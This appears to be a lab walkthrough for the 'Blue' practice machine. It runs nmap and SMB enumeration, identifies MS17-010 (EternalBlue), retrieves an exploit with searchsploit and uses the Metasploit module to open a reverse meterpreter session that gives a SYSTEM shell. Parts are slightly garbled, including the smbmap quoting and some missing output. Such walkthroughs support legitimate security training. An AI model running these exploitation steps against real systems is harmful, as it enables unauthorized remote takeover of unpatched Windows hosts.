Blue

Reconnaissance:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.40

135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC

Host script results:
| smb2-time: 
|   date: 2023-12-10T02:48:34
|_  start_date: 2023-12-10T02:39:33
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-12-10T02:48:33+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O -p- 10.10.10.40

nmap found three standard Windows ports in RPC (135), NetBios (139), and SMB (445), as well as some high RPC associated ports in the 49000s. The SMB output says this is Windows 7 Professional.

SMB - TCP 445

Shares: There are a couple shares with null session read access (the trick of giving smbmap wrong creds works here):

┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.10.40

┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.10.40 -u "0xdf -p "0xdf
[+] IP: 10.10.10.40:445 Name: 10.10.10.40               Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        Share                                                   READ ONLY
        Users                                                   READ ONLY

Share is empty:

┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.10.40/share

Users has just empty Default and Public folders:

┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.10.40/users

Vulns: nmap has vuln scripts that will check for known vulnerabilities in service. I’ll run them here, and it finds a big one, MS-17-010:

┌──(kali㉿kali)-[~]
└─$ nmap -v -script smb-vuln* -p 139,445 10.10.10.40 

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

Exploitation: Shell as System

MS-17-010, otherwise known as ETERNALBLUE, is a unauthenticated remote code execution vulnerability in Windows SMB most famous for it’s leak by the Shadow Brokers and for driving the WannaCry worm in May 2017.

The exploits in Metasploit for MS17-010 are much more stable than the Python script counterparts. If you’re doing this in the real world, I’d strongly recommend using Metasploit here. If you’re doing this for some kind of training activity that doesn’t allow Metasploit (like OSCP), then the downside of crashing a few boxes acceptable. I’ll show both.

Metasploit: Search for a non Metasploit exploit in the Exploit Database.

┌──(kali㉿kali)-[~]
└─$ searchsploit --id MS17-010
------------------------------------------------------------ ---------------------------------
 Exploit Title                                              |  EDB-ID
------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'Eter | 43970
Microsoft Windows - SMB Remote Code Execution Scanner (MS17 | 41891
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code | 42031
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalB | 42315
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB R | 42030
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SM | 41987
------------------------------------------------------------ ---------------------------------

We’re working with Windows 7 so we’ll use exploit # 42315. Clone the exploit into the working directory.

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 42315
  Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
      URL: https://www.exploit-db.com/exploits/42315
     Path: /usr/share/exploitdb/exploits/windows/remote/42315.py
    Codes: CVE-2017-0144
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/42315.py

┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole

msf6 > search ms17-010
msf6 > use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.8
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Running it returns a shell as SYSTEM:
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

meterpreter > getuid 
meterpreter > shell